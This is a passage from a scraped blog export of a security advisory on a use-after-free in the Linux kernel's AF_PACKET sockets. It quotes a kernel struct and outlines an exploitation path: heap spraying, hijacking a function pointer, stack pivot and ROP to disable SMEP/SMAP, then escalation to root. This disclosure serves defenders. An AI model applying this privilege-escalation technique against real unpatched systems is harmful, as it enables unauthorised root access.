class=\"crayon-v\">dev<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* NULL is wildcarded here\t&nbsp;&nbsp;&nbsp;&nbsp; *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab19922582584-5\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">func<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sk_buff *<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab19922582584-6\"><span class=\"crayon-h\">\t\t\t\t\t <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">net_device *<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab19922582584-7\"><span class=\"crayon-h\">\t\t\t\t\t <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_type *<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab19922582584-8\"><span class=\"crayon-h\">\t\t\t\t\t <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">net_device *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab19922582584-9\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">id_match<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_type *<\/span><span class=\"crayon-v\">ptype<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab19922582584-10\"><span class=\"crayon-h\">\t\t\t\t\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sock *<\/span><span class=\"crayon-v\">sk<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab19922582584-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">af_packet_priv<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab19922582584-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">list_head\t<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab19922582584-13\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab19922582584-14\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p>The function pointers inside of struct packet_type, and the fact it is in a big slab (kmalloc-4096) makes heap spraying easier and more reliable as bigger slabs are less often used by the kernel.<\/p>\n<p>We can use usual kernel heap spraying to replace the content of the freed <em>packet_fanout<\/em> object by using for example <em>sendmmsg()<\/em> or any other mean.<\/p>\n<p>Even if the allocation is not permanent, it will still replace the targeted content in <em>packet_fanout<\/em> (ie. the function pointers) and due to the fact that <em>kmalloc-4096<\/em> is very stable, it is very less likely that another allocation will corrupt our payload. <\/p>\n<p><em>id_match()<\/em> will be called when sending a <em>skb<\/em> via <em>dev_queue_xmit()<\/em> which can be reached via a <em>sendmsg<\/em> on a <em>AF_PACKET<\/em> socket. It will loop through the list of packet handler calling <em>id_match()<\/em> if not NULL. Thus, we have a PC control situation.<\/p>\n<p>Once we know where the code section of the kernel is, we can pivot the kernel stack into our fake <em>packet_fanout<\/em> object and ROP. The first argument <em>ptype<\/em> contains the address of the <em>prot_hook<\/em> member of our fake object, which allows us to know where to pivot.<\/p>\n<p>Once into ROP, we can jump into <em>native_write_c4(x)<\/em> to disable SMEP\/SMAP, and then we could think about jumping back into a userland mmaped executable payload that would call <em>commit_creds(prepare_kernel_cred(0))<\/em> to elevate our user process privilege to root.<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3484\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 17 Oct 2017 11:42:53 +0000<\/strong><\/p>\n<p>Vulnerabilities summary The following advisory describes a use-after-free vulnerability found in Linux Kernel&#8217;s implementation of AF_PACKET that can lead to privilege escalation. AF_PACKET sockets &#8220;allow users to send or receive packets on the device driver level. This for example lets them to implement their own protocol on top of the physical layer or to sniff &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3484\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Linux Kernel AF_PACKET Use-After-Free<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11946,10757,13145],"class_list":["post-9947","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9947"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9947\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9947"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}